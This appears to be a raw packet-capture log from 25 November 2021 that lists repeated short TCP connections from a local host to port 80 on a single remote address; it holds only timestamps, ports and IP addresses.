Nov 25, 2021 10:50:20.295161009 CET	50097	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.328502893 CET	80	50097	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.688319921 CET	50098	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.721556902 CET	80	50098	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.721837997 CET	50098	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.723423958 CET	50098	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.756454945 CET	80	50098	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.756654024 CET	50098	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.789882898 CET	80	50098	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.805862904 CET	80	50098	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.805912971 CET	80	50098	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:20.806137085 CET	50098	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.806185007 CET	50098	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:20.839731932 CET	80	50098	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.124854088 CET	50099	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.158263922 CET	80	50099	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.158473969 CET	50099	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.159996986 CET	50099	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.193408012 CET	80	50099	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.193694115 CET	50099	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.227320910 CET	80	50099	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.243401051 CET	80	50099	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.243449926 CET	80	50099	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.243618965 CET	50099	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.243670940 CET	50099	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.277081966 CET	80	50099	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.613725901 CET	50100	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.647298098 CET	80	50100	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.647511005 CET	50100	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.648991108 CET	50100	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.682306051 CET	80	50100	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.682538033 CET	50100	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.715898991 CET	80	50100	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.732023001 CET	80	50100	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.732072115 CET	80	50100	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:21.732253075 CET	50100	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.732301950 CET	50100	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:21.765682936 CET	80	50100	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.130780935 CET	50101	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.164900064 CET	80	50101	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.165201902 CET	50101	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.166712999 CET	50101	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.200685978 CET	80	50101	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.200891018 CET	50101	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.235119104 CET	80	50101	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.252677917 CET	80	50101	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.252729893 CET	80	50101	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.252933025 CET	50101	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.252985001 CET	50101	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.287132025 CET	80	50101	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.644932985 CET	50102	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.679056883 CET	80	50102	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.679349899 CET	50102	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.680855989 CET	50102	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.714838982 CET	80	50102	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.715112925 CET	50102	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.749093056 CET	80	50102	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.764718056 CET	80	50102	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.764767885 CET	80	50102	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:22.765034914 CET	50102	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.765084028 CET	50102	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:22.799320936 CET	80	50102	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.153809071 CET	50103	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.187957048 CET	80	50103	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.188496113 CET	50103	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.190149069 CET	50103	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.224083900 CET	80	50103	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.224267006 CET	50103	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.258212090 CET	80	50103	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.279185057 CET	80	50103	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.279228926 CET	80	50103	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.279325962 CET	50103	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.279539108 CET	50103	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.313338995 CET	80	50103	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.682682037 CET	50104	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.716075897 CET	80	50104	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.716363907 CET	50104	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.717956066 CET	50104	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.751281977 CET	80	50104	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.751558065 CET	50104	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.785080910 CET	80	50104	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.802470922 CET	80	50104	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.802540064 CET	80	50104	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:23.802759886 CET	50104	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.802840948 CET	50104	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:23.836200953 CET	80	50104	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.150311947 CET	50105	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.184072018 CET	80	50105	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.184247017 CET	50105	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.185755968 CET	50105	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.219491959 CET	80	50105	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.219649076 CET	50105	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.253429890 CET	80	50105	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.289542913 CET	80	50105	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.289575100 CET	80	50105	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.289726019 CET	50105	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.289769888 CET	50105	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.323762894 CET	80	50105	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.667150974 CET	50106	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.701220036 CET	80	50106	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.701452971 CET	50106	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.703006983 CET	50106	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.737000942 CET	80	50106	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.737179041 CET	50106	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.771234989 CET	80	50106	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.981559992 CET	80	50106	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.981579065 CET	80	50106	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:24.981868029 CET	50106	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:24.981884956 CET	50106	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:25.015722990 CET	80	50106	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:25.297626972 CET	50107	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:25.331115961 CET	80	50107	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:25.331418037 CET	50107	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:25.332854033 CET	50107	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:25.366197109 CET	80	50107	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:25.366420031 CET	50107	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:25.399882078 CET	80	50107	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:25.665313005 CET	80	50107	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:25.665364981 CET	80	50107	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:25.665497065 CET	50107	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:25.665553093 CET	50107	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:25.698976994 CET	80	50107	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:26.042836905 CET	50108	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.076205969 CET	80	50108	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:26.076451063 CET	50108	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.078077078 CET	50108	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.111377001 CET	80	50108	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:26.111706972 CET	50108	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.145047903 CET	80	50108	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:26.376755953 CET	80	50108	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:26.376811981 CET	80	50108	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:26.377007008 CET	50108	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.377057076 CET	50108	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.410444021 CET	80	50108	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:26.772083998 CET	50109	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.806118965 CET	80	50109	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:26.806345940 CET	50109	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.807857990 CET	50109	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.841866016 CET	80	50109	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:26.842061043 CET	50109	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:26.876063108 CET	80	50109	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:27.173216105 CET	80	50109	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:27.173295021 CET	80	50109	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:27.173525095 CET	50109	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:27.173578978 CET	50109	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:27.207834005 CET	80	50109	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:27.560900927 CET	50110	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:27.594371080 CET	80	50110	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:27.594661951 CET	50110	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:27.596260071 CET	50110	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:27.630248070 CET	80	50110	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:27.630498886 CET	50110	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:27.663824081 CET	80	50110	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:27.975099087 CET	80	50110	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:27.975195885 CET	80	50110	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:27.975368977 CET	50110	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:27.975455046 CET	50110	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.008989096 CET	80	50110	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.366153955 CET	50111	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.400223970 CET	80	50111	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.400429964 CET	50111	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.402048111 CET	50111	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.436008930 CET	80	50111	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.436250925 CET	50111	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.470434904 CET	80	50111	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.492588997 CET	80	50111	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.492652893 CET	80	50111	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.492796898 CET	50111	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.492858887 CET	50111	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.527102947 CET	80	50111	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.860153913 CET	50112	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.894247055 CET	80	50112	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.894541979 CET	50112	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.896038055 CET	50112	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.930003881 CET	80	50112	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.930179119 CET	50112	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.964154005 CET	80	50112	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.986506939 CET	80	50112	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.986557007 CET	80	50112	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:28.986726999 CET	50112	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:28.986777067 CET	50112	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.021034956 CET	80	50112	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:29.384191990 CET	50113	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.417586088 CET	80	50113	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:29.417949915 CET	50113	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.419476032 CET	50113	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.452810049 CET	80	50113	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:29.452986956 CET	50113	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.486265898 CET	80	50113	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:29.507684946 CET	80	50113	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:29.507740974 CET	80	50113	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:29.508042097 CET	50113	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.508093119 CET	50113	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.541513920 CET	80	50113	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:29.905330896 CET	50114	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.939495087 CET	80	50114	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:29.939697981 CET	50114	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.941230059 CET	50114	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:29.975208044 CET	80	50114	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:29.975507021 CET	50114	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.009754896 CET	80	50114	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.027120113 CET	80	50114	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.027174950 CET	80	50114	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.027400017 CET	50114	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.027452946 CET	50114	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.061698914 CET	80	50114	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.425203085 CET	50115	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.458631992 CET	80	50115	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.458949089 CET	50115	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.460479021 CET	50115	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.493835926 CET	80	50115	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.494013071 CET	50115	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.527324915 CET	80	50115	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.543375015 CET	80	50115	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.543422937 CET	80	50115	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.543564081 CET	50115	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.543612957 CET	50115	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.577152014 CET	80	50115	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.926840067 CET	50116	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.960278988 CET	80	50116	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.960527897 CET	50116	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.962182045 CET	50116	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:30.995505095 CET	80	50116	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:30.995687962 CET	50116	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.029041052 CET	80	50116	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.045028925 CET	80	50116	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.045078039 CET	80	50116	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.045284986 CET	50116	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.045335054 CET	50116	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.079001904 CET	80	50116	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.433448076 CET	50117	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.467533112 CET	80	50117	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.467782974 CET	50117	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.469315052 CET	50117	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.503462076 CET	80	50117	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.503714085 CET	50117	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.537735939 CET	80	50117	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.557591915 CET	80	50117	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.557647943 CET	80	50117	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.557919979 CET	50117	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.558002949 CET	50117	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.592221022 CET	80	50117	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.961415052 CET	50118	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.994882107 CET	80	50118	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:31.995033026 CET	50118	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:31.996695042 CET	50118	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.030042887 CET	80	50118	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.030255079 CET	50118	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.063540936 CET	80	50118	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.082495928 CET	80	50118	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.082545042 CET	80	50118	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.082742929 CET	50118	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.082792997 CET	50118	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.116194010 CET	80	50118	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.465740919 CET	50119	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.499703884 CET	80	50119	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.499919891 CET	50119	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.501487970 CET	50119	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.535314083 CET	80	50119	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.535531998 CET	50119	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.569425106 CET	80	50119	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.603969097 CET	80	50119	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.604017019 CET	80	50119	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.604166985 CET	50119	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.604214907 CET	50119	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:32.638302088 CET	80	50119	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:32.995454073 CET	50120	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.029481888 CET	80	50120	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.029735088 CET	50120	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.031277895 CET	50120	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.065247059 CET	80	50120	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.065408945 CET	50120	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.099555016 CET	80	50120	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.117424011 CET	80	50120	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.117491961 CET	80	50120	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.117773056 CET	50120	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.117856026 CET	50120	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.152144909 CET	80	50120	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.506480932 CET	50121	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.539973974 CET	80	50121	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.540296078 CET	50121	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.541841030 CET	50121	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.575144053 CET	80	50121	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.575417042 CET	50121	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.608853102 CET	80	50121	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.626410961 CET	80	50121	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.626461983 CET	80	50121	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:33.626831055 CET	50121	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.626884937 CET	50121	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:33.660376072 CET	80	50121	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.055175066 CET	50122	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.088645935 CET	80	50122	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.088851929 CET	50122	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.090399027 CET	50122	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.123708963 CET	80	50122	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.123938084 CET	50122	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.157217026 CET	80	50122	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.183954000 CET	80	50122	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.184003115 CET	80	50122	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.184175014 CET	50122	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.184221983 CET	50122	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.217529058 CET	80	50122	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.573436022 CET	50123	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.606822968 CET	80	50123	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.607076883 CET	50123	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.608633995 CET	50123	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.641993046 CET	80	50123	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.642211914 CET	50123	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.675589085 CET	80	50123	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.695179939 CET	80	50123	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.695235014 CET	80	50123	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:34.695554018 CET	50123	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.695637941 CET	50123	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:34.729156971 CET	80	50123	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.064492941 CET	50124	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.097671986 CET	80	50124	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.097845078 CET	50124	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.099443913 CET	50124	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.132618904 CET	80	50124	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.132868052 CET	50124	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.166157961 CET	80	50124	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.189446926 CET	80	50124	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.189496040 CET	80	50124	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.189682961 CET	50124	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.189743996 CET	50124	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.223092079 CET	80	50124	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.530739069 CET	50125	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.564593077 CET	80	50125	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.564930916 CET	50125	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.566498041 CET	50125	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.600289106 CET	80	50125	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.600450039 CET	50125	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.634319067 CET	80	50125	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.649811029 CET	80	50125	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.649832964 CET	80	50125	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:35.649950027 CET	50125	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.649992943 CET	50125	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:35.683965921 CET	80	50125	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.023454905 CET	50126	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.057571888 CET	80	50126	176.223.209.128	192.168.11.20
